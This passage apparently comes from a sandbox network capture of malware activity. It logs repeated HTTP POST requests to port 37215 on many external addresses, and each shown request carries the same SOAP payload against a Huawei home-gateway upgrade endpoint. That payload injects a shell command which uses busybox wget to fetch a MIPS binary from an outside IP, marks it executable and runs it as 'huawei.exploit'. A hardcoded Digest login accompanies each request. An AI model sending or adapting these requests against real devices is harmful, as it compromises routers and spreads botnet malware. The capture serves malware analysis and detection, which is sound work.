                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    396192.168.2.234100041.117.26.25437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260454893 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    397192.168.2.236010441.146.68.7537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260509014 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    398192.168.2.235811641.248.71.19037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260550022 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    399192.168.2.2349868156.250.80.13937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260638952 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    400192.168.2.2357732156.1.199.15537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260685921 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    401192.168.2.2353226197.146.75.13937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260736942 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    402192.168.2.235401041.131.43.24937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260926008 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    403192.168.2.2355978197.175.191.14137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.260976076 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    404192.168.2.2357540156.172.199.7337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261023045 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    405192.168.2.234409241.191.51.12637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261075974 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
